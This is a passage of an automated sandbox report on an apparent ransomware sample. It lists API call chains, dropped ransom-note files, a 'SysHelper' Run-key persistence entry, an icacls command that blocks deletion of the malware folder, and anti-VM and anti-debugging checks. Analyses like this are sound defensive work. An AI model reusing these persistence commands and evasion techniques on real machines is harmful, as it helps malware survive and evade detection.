              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221073589.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Snz source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220925314.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F22220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00F22220
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F38565 push ecx; ret 0_2_00F38578
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 2_2_00F38565 push ecx; ret 2_2_00F38578
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 3_2_00F28565 push ecx; ret 3_2_00F28578
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 4_2_00F28565 push ecx; ret 4_2_00F28578

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.tgvv (copy)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\Users\user\AppData\Local\Temp\wctF86A.tmp
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\$WinREAgent\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\$WinREAgent\Scratch\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe File created: C:\Users\user\_readme.txt
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F91920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Stalling execution: Execution stalls by calling Sleep graph_2-41348
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Code function: 0_2_00F11193 rdtsc 0_2_00F11193
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F91920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_00F1E670
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_00F1E670
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00F0E670
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,4_2_00F0E670
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Thread delayed: delay time: 1200000
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Dropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.tgvv (copy)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmp
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Evaded block: after key decision
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-39445
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe API coverage: 5.2 %
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe TID: 3620 Thread sleep time: -1200000s >= -30000s
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe TID: 2892 Thread sleep count: 170 > 30
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F20160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00F1FB98
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F20160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_00F1FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F10160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00F0FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F10160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00F0FB98
Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Thread delayed: delay time: 1200000
Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.00000000008D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWD
Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C52000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000003.1636870769.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.0000000000848000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.000000000075E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe API call chain: ExitProcess graph end node graph_0-39447
Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F11193 rdtsc 0_2_00F11193
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F34168 _memset,IsDebuggerPresent,0_2_00F34168
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F3A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00F3A57A
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F91920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00F91920
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F22220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00F22220
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F378D5 GetProcessHeap,0_2_00F378D5
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F429EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F429EC
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F429BB SetUnhandledExceptionFilter,0_2_00F429BB
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F429EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F429EC
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F429BB SetUnhandledExceptionFilter,2_2_00F429BB
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F329EC
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F329BB SetUnhandledExceptionFilter,3_2_00F329BB
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F329EC
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F329BB SetUnhandledExceptionFilter,4_2_00F329BB
Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe Process created: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe "C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --Admin IsNotAutoStart IsNotTask
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F11000 cpuid 0_2_00F11000
